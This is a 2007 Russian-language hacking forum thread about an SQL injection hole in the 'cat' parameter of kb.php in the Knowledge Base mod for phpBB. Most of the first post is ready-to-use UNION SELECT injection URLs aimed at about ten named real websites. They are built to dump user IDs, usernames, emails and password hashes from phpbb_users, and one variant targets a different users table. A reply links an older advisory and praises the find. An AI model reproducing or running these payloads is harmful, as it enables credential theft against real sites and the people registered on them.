Форумы Sql injection в Knowledge Base

Discussion in 'Уязвимости CMS/форумов' started by kamaz, 5 Apr 2007.

  1. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    Случайно наткнулся :) В поисковиках и на ачате ничего по этому поводу не нашел. Хотя бага старая. Так что если уже было, plz, больно не пинайте :)

    Программа: Knowledge Base (мод для phpBB)

    Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

    Уязвимость существует из-за недостаточной обработки входных данных в параметре "cat" в сценарии kb.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Пример:
    http://site/kb.php?mode=cat&cat=-1[sql injection]

    Принтабельно вророе поле, информация выводится в title.

    От чего зависит количество полей, я хз, но попадаются скули с 6 или с 24 полями.

    Примеры с 6:

    Code:
    http://www.startrek-gamers.com/forum/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6%20from%20phpbb_users%20limit%201,2/*
    Code:
    http://crossandflame.com/forum/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6%20from%20phpbb_users%20limit%201,2/*
    Code:
    http://phpbb-auction.com/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6%20from%20phpbb_users%20limit%201,2/*
    Code:
    http://www.teamdirection.com/phpBB2/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6%20from%20phpbb_users%20limit%202,2/*
    Code:
    http://www.kartonwork.pl/forum/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6%20from%20phpbb_users%20limit%201,2/*
    Code:
    http://www.websiteforum.nl/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6%20from%20phpbb_users%20limit%201,2/*
    Code:
    http://www.brazilfw.com.br/forum/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6%20from%20phpbb_users%20limit%201,2/*
    Примеры с 24:

    Code:
    http://forum.screamer-hardstyle.com/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20phpbb_users%20limit%201,2/*
    Code:
    http://forum.pacan.net/kb.php?mode=cat&cat=-1%20union%20select%201,concat(user_id,char(58),username,char(58),user_email,char(58),user_icq,char(58),user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20phpbb_users%20limit%201,2/*
    Иногда отсутствует столбец phpbb_users, тогда делаем то же, что и при нахождении обычной скули. Например:

    Code:
    http://www.esnsweden.org/forum/kb.php?mode=cat&cat=-1%20union%20select%201,concat(name,char(58),login,char(58),pass),3,4,5,6%20from%20users%20limit%201,2/*
    Воть :)
     
    5 people like this.
  2. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    некогда вникать, но сравни с __http://www.artofhacking.com/tucops/hack/webbbsfe/live/aoh_hack7435.htm, кажется это оно и есть...

    2005 год.

    Ну что могу сказать, не смотря что скуля давняя, ты ее нашел в последних версиях форумов, то есть форумы обновляют, а мод нет.

    Всё равно молодец
     
    #2 Thanat0z, 5 Apr 2007
    Last edited: 5 Apr 2007
    1 person likes this.